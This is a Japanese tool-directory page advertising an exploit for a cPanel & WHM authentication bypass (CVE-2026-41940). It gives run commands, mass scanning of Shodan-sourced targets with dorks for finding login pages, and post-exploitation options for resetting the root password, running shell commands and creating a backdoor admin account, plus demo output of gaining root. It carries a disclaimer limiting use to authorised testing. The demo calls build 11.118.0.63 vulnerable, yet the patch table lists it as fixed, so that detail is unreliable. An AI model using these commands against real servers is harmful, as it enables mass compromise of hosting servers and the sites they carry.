Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-41940 — cPanel & WHM - セッションファイルCRLFインジェクションによる認証バイパス | Kitploit
ツール/GitHubGitHub/0xgh057r3c0n/cve-2026-41940
認証と認可脆弱性スキャナーエクスプロイトウェブアプリケーション悪用ポストエクスプロイトペネトレーションテストレッドチーミング
GitHub0xgh057r3c0n/cve-2026-41940

CVE-2026-41940

cPanel & WHM - セッションファイルCRLFインジェクションによる認証バイパス

リポジトリを見る
110時間20分前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🔥 CVE-2026-41940 – cPanel & WHM 認証バイパス

cPanel

⚡ 未認証ルート – セッションファイル CRLF インジェクション ⚡
「すべてを支配する一つのチェーン。」

Python License No deps CVSS


🧠 エクスプロイトの概要

root@kitploit:~
┌─────────────────────────────────────────────────────────────┐
│  ステージ 1  ──  事前認証セッションクッキーを発行          │
│  ステージ 2  ──  `Authorization` ヘッダー経由の CRLF 注入   │
│  ステージ 3  ──  `do_token_denied` を発火(raw → cache)   │
│  ステージ 4  ──  JSON API 経由で WHM ルートアクセスを検証  │
└─────────────────────────────────────────────────────────────┘

💥 結果 – 認証情報不要で WHM への完全なルートアクセスを獲得。


📜 ライセンス

このプロジェクトは MIT ライセンス の下で公開されています – 自由に使用・変更・配布できますが、悪用はしないでください 😈。
詳細は LICENSE ファイルを参照してください。


🛠️ インストール – 文字通り一行だけ

root@kitploit:~
git clone https://github.com/0xgh057r3c0n/CVE-2026-41940.git && cd CVE-2026-41940

依存関係ゼロ – Python 3 標準ライブラリのみ。
pip や virtualenv などの面倒なものは一切不要です。


🚀 クイックスタート – 今すぐ実行

単一ターゲット

root@kitploit:~
./CVE-2026-41940.py -u https://target.com:2087

ファイルからの大量スキャン

root@kitploit:~
./CVE-2026-41940.py -l targets.txt -t 20 -o results.json

外部ツールからのパイプ(Shodan、subfinder など)

root@kitploit:~
shodan search --fields ip_str,port 'title:"WHM Login"' | \
  awk '{print "https://"$1":"$2}' | ./CVE-2026-41940.py -t 30

🎯 コマンドラインオプション(便利な機能)


💀 エクスプロイト後の攻撃ツール

サーバーを掌握したら、以下が可能です:

  • 🔍 すべての cPanel アカウントを一覧表示 – --action list
  • 🔑 root パスワードを変更 – --action passwd --passwd "h4ck3d!"
  • 🖥️ OS コマンドを実行 – --action cmd --cmd "id;whoami"
  • 📡 対話型シェル – --action shell(完全な WHM ターミナル)
  • 👤 バックドア管理者を作成 – --action adduser --new-user backdoor --new-domain evil.com --passwd "pwn3d"
  • 📂 ファイルを読み取り(シェル経由)– cat /etc/passwd
  • 📊 サーバー情報を収集 – --action info

🧪 デモ – 実行結果の例

root@kitploit:~
$ ./CVE-2026-41940.py -u https://192.168.1.100:2087

  設定:
   ターゲット : 1
   スレッド   : 10
   タイムアウト: 15秒
   アクション : スキャンのみ

[10:23:15] [SCAN] 4段階エクスプロイトチェーンを開始... https://192.168.1.100:2087
[10:23:15] [INFO] 正規ホスト名を検出: server.example.com
[10:23:15] [STEP] ステージ 1/4 — 事前認証セッションを発行...
[10:23:16] [  OK] ステージ1: 事前認証セッション = 9a7f8e3d2c1b0a9f
[10:23:16] [STEP] ステージ 2/4 — Authorization ヘッダー経由で CRLF 注入...
[10:23:17] [  OK] ステージ2: HTTP 302 → token=/cpsess1234567890
[10:23:17] [STEP] ステージ 3/4 — do_token_denied ガジェットを発火(raw→cache)...
[10:23:18] [  OK] ステージ3: HTTP 401 — do_token_denied ガジェット発火
[10:23:18] [STEP] ステージ 4/4 — WHM ルートアクセスを検証...
[10:23:18] [INFO] ステージ4: HTTP 200  {"version":"11.118.0.63",...}
[10:23:18] [PWND] CVE-2026-41940 確認 — WHM ルートアクセス獲得! (v11.118.0.63 — 脆弱性確認済み)
[10:23:18] [PWND]   トークン   : /cpsess1234567890
[10:23:18] [PWND]   セッション : 9a7f8e3d2c1b0a9f
[10:23:18] [PWND]   バージョン : 11.118.0.63
[10:23:18] [PWND]   API URL  : https://192.168.1.100:2087/cpsess1234567890/json-api/version

  CVE-2026-41940 — スキャン完了
  時間: 3.2秒  ·  ターゲット: 1

  1 件の脆弱なターゲット

  [*] ターゲット : https://192.168.1.100:2087
  [*] バージョン : 11.118.0.63
  [*] トークン   : /cpsess1234567890
  [*] API URL  : https://192.168.1.100:2087/cpsess1234567890/json-api/version
  [*] セッション : 9a7f8e3d2c1b0a9f
  [*] 証拠     : {"version":"11.118.0.63",...}

🔎 Shodan ダーク(獲物を探す)

root@kitploit:~
title:"WHM Login"
title:"WebHost Manager" port:2087
product:"cPanel" port:2087

📊 影響を受けるバージョン – パッチ状況

上記ビルド 未満 のすべてのバージョンが脆弱です。


🕵️‍♂️ 作者 & クレジット

0xgh057r3c0n – セキュリティ研究者、リバースエンジニア、そしてコーヒー中毒者。
GitHub | Twitter


⚠️ 免責事項

このツールは許可されたセキュリティテストおよび教育目的のみを意図しています。
コンピュータシステムへの不正アクセスは違法です。作者および貢献者は、このソフトウェアの誤用または損害について一切の責任を負いません。
責任を持って使用し、常に事前に許可を取得してください。


🌟 サポート / 貢献

  • バグを発見しましたか? イシューを開いてください。
  • コードを改善したいですか? PR を歓迎します。
  • このツールが気に入りましたか? GitHub で ⭐ を付けてください!

🔥 ハック・ザ・プラネット、ただし合法的に。 🔥

ツールをダウンロード
フラグ説明
-u, --url単一ターゲット URL(例: https://host:2087)
-l, --listURL を1行ごとに記載したファイル
--hostname正規の Host ヘッダーを上書き(自動検出)
-t, --threadsスレッド数(デフォルト: 10)
--timeoutタイムアウト秒数(デフォルト: 15)
--rate-limitターゲット間の待機時間(秒)
--actionエクスプロイト後アクション: list、passwd、cmd、exec、info、version、shell、adduser
--passwd新しい root パスワード(--action passwd と併用)
--cmdOS コマンド(--action cmd/exec と併用)
--new-user新しい cPanel ユーザー名(--action adduser と併用)
--new-domain新しい cPanel ドメイン(--action adduser と併用)
-o, --output結果を JSON で保存
ブランチパッチ適用ビルドステータス
11.11011.110.0.97🛡️ 修正済み
11.11811.118.0.63🛡️ 修正済み
11.12611.126.0.54🛡️ 修正済み
11.13211.132.0.29🛡️ 修正済み
11.13411.134.0.20🛡️ 修正済み
11.13611.136.0.5🛡️ 修正済み